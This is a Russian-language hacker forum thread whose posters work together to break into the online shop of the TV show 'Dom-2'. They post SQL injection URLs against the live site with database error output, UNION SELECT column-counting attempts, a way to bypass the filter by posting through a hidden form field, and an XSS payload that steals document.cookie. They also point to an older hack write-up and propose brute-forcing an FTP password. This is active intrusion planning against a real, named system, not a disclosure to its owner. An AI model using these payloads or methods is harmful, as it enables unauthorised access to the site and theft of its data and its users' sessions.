Не люблю дом 2 и решил полазить по сайту. Полазив увидел, что вроде в ссылка и в формах везде стоит фильтрующий скрипт, т.е. никакой ' и других похожих знаков, а также union и другие слова. Только вот в магазине, при в url (да и не только в магазине) можно написать &id=1+1 или что-то похожее, но есть скрипт, который не фильтрует union запросы. Единственная проблема, вкл мэджик квоутс. Полазил сам, но нет времени и желания дальше разрабатывать. Кто хочет, смотрите: http://shop.dom2.ru/shop/index.phtml?prod=62%200 - Вызывает ошибку. Там есть скрытое поле prod, в которое можно вводить текст типа 0 union select * from ... Дерзайте. Только обязательно расскажите, что еще там можно.
думаю что бы проще было подобрать поля, нужно взять журнал хакер в котором было видео про взлом дом2 и глянуть там названия полей и собственно структуру базы
Иньекция на лицо.... http://shop.dom2.ru/shop/index.phtml?prod=62+or+1=1 Кто выложите видео или структуру...
_http://shop.dom2.ru/shop/index.phtml?prod=. Code: Query Error! You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1Query Error! You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1 _http://shop.dom2.ru/shop/index.phtml?prod=... HTML: Query Error! You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'LIMIT 1' at line 1 Хм, вещь какая-то: _http://img145.imageshack.us/my.php?image=dombh0.jpg
баян.. после 1го взлома там все фильтруется, юнион селект не проведешь - фильтр на некотрые нужные символы, а во вторых там ограничение на длину пеерменной .. символов 10 не больше (не помню точно).
так это фильтруется если через ГЕТ (фильтруются не только некоторые символы, но и "union" и "select" и еще кой че), а если вставлять запрос через hidden-поле в сурсе, то запросы ПОСТОМ проходят...
это было в 76 номере, кстати, эти ошибки там уже и описывались... а видео я к сожалению так и не нашел..
Да, фильтр только на гет стоит. Вообще из личных наблюдений, то там параметр prod исользуется 2 запросами, в одном из них выводится 5 значений (полей), в другом 8. Если в хиден поле такое 0 UNION SELECT null то ошибки две Query Error! The used SELECT statements have a different number of columnsQuery Error! The used SELECT statements have a different number of columns Если 0 union select null,null,null,null,null или 0 union select null,null,null,null,null,null,null,null то одна Query Error! The used SELECT statements have a different number of columns Сложность в том, что в любом случае я не смог работать, потому что не видел результата из-за одной из ошибок. Использование char() вроде запрещено. Хотя я не уверен, до этого редко с ним работал, но вроде получалось.
ну да, ту же ботву вчера обнаружил... http://shop.dom2.ru/shop/index.phtml?prod=<BODY%20ONLOAD=alert(document.cookie)> <==xss получаица а может эту тему в "XSS, SQL, Инъекции. Уязвимости, найденные вами" перенести?
Статья в ксакепе называлалсь что-то вроде Тотальный дестрой дома два... там на скриншотах бд в подробностях показывалась =) в тему о том что написал чувак снизу - там название полей были видны. и названия бд.. врядли изменили..
Вот залил к себе... а то там много. _http://killsite.narod.ru/068/1.htm (только тут без скринов.) И кстати, насколько я помню он там вообще через другой, проэкт ломанул, который просто на одном сервере с Домом 2 лежит. Там phpBB 2.0.6 стоял. Не удивительно. P.S - завтра пойдём гулять, забегу к знакомому, у него походу это видео есть. Потом залью куда-нить.
гы Его уже имели =) вроде как видео даже на видеоачате есть, если не ошибаюсь, если есть, то вперед! =)
упомянутая в статье Гринвуда полезная ссылочка _http://www.tnt-tv.ru/info.php и сейчас вполне рабочая.. кроме того там упоминается логин к фтп, мож стоить побрутить? полтора года назад там стоял "сложный" трехбуквенный пасс
мля, а че это _www.dom.2 перестала работать? shop работает, а сам сайт - нет... признавайтесь, кто испортил сайт?? =)))